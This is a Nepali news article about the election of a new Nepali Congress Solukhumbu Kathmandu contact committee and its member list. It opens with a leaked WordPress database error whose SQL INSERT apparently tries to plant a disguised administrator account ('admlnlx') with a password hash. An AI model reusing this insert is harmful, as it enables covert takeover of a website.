WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BEZ2FR6hjSL4NrQ2l3PEDfn4iw9kdf/', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-28 13:15:19', '', 'admlnlx', 'admlnlx')
गाउँले न्युज, ८ भदौ, काठमाडौं । नेपाली कांगे्रस सोलुखुम्बु काठमाडौं सम्पर्क समितिको अध्यक्षमा सोताङका गोकर्ण बस्नेत निर्वाचित हुनुभएको छ । शनिबार काठमाडौंको गोल्डेन लाइट पार्टीप्यालेसमा सम्पन्न समितिको भेलाबाट बस्नेतको नेतृत्वमा ८२ सदस्यीय नयाँ कार्यसमिति चयन गरेको हो ।
समितिको नयाँ कार्यसमितिमा पाँच जना उपाध्यक्ष, तीन जना सचिव, नौ जना सचिव र एक कोषाध्यक्षको व्यवस्था गरिएको छ । सोअनुसार खुल्ला उपाध्यक्षमा फुनुरु शेर्पा, महिला खुल्ला उपाध्यक्षमा विमला गुरुङ, दलित संघ उपाध्यक्षमा बलबहादुर बराईली, प्रदेश (क) उपाध्यक्षमा बाबुराजा केसी, प्रदेश (ख) उपाध्यक्षमा चन्द्र बहादुर राई रहनुभएको छ भने खुल्ला सचिवमा टार्जन कुलुङ, प्रदेश (क) सचिवमा सौरभ बरुवाल र प्रदेश (ख) सचिवमा सरोज बस्नेत रहनुभएको छ ।
खुल्ला सहसचिवमा भरत काफ्ले, सहसचिवहरुमा मानबहादुर मगर, रामचन्द्र बस्नेत, दोर्जी शेर्पा, उत्तरबहादुर कार्की, अविकेशर कट्टेल, उदय राई, लिलाराम बस्नेत, नलक धन कुलुङ र कार्यसमितिको कोषाध्यक्षमा नविन कार्की चयन हुनुभएको छ ।
सदस्यहरुमा भविन कार्की, ल्हाक्पानुरी शेर्पा, कुल बहादुर मगर, छिरिङ पाल्जु लामा, अमर बहादुर बस्नेत, उर्मिला खड्का, देवध्वज खड्का, अप्सरा खड्का, विष्णु बस्नेत, मिंमा शेर्पा, फुनुरु शेर्पा, रुपकाजी मगर, पासाङ रिञ्जी शेर्पा, मिङमा छिरी शेर्पा, प्रकश रेग्मी मगर, विनिता रेग्मी मगर, राजकुमार राई, शुक्रबीर राई, भूपाल राई, शान्तिराम राई, बोधनारायण श्रेष्ठ, आइ कुमार राई, दिपक बास्तोला, कर्मा शेर्पा, भूमिका कोइराला, गणेश थापा, पासाङ राई, हेमन्त बन, अर्जुन राई, विजय गुरुङ, विकास बस्नेत, गोकर्ण भुजेल, दिप राई, लक्ष्मी राई, विमल बस्नेत, राजन कुमार राई, दा गेल्जेन शेर्पा, मित्रमाया राई (कुलुङ), धन प्राद कुलुङ, हेमराज शर्मा कट्टेल, आस्था निरौला, विकास बस्नेत, भिमबहादुर विक, शान्ति बस्नेत केसी, ङिमा दावा शेर्पा, जङबुधन कुलुङ, केदार कार्की, अमर बहादुर मगर, महेश मगर, निशान थापा मगर, पासाङ दावा शेर्पा, प्रकाश रानामगर, प्रकाश राना मगर, विन्दु राई, कल्पना राई, कुमारी खालिङ राई, उत्तम प्रसाद राई, यज्ञ बहादुर बस्नेत, मिना बन, बुद्ध बहादुर श्रेष्ठ, दिपक बुढाथोकी मगर, कपील राई र विशाल राई रहनुभएको छ ।
पूर्वमन्त्री तथा नेपाली कांगे्रसका केन्द्रीय सदस्य बलबहादुर केसीको प्रमुख आतिथ्यता तथा सोलुखुम्बु जिल्लाका सभापति विनोद बस्नेतको सभापतित्वमा सम्पन्न उक्त भेलाबीच पार्टी प्रवेशसमेत गराइयो । कार्यक्रममा पूर्व जिल्ला सभापति प्रभुराम बस्नेत, नेता प्रकाशसिंह कार्की, महासमिति सदस्य खिलराज बस्नेत, भोजराज कार्कीलगायतको उपस्थिति रहेको थियो ।
पार्टीको दोस्रो र तेस्रो चरणको जागरण अभियान अन्तर्गत आगामी भदौं १५ भित्र संघीय तथा प्रदेश निर्वाचन क्षेत्र र असोज १५ भित्र स्थानीय तहको संगठन विस्तार एवं पुनर्गठनको काम सक्ने र सोहीअन्तर्गत सोलुखुम्बु काठमाडौं सम्पर्क समितिको नयाँ कार्यसमिति चयन गरिएको सभापति विनोद बस्नेतले घोषणा गर्नुभएको थियो ।
sourse:shikharpost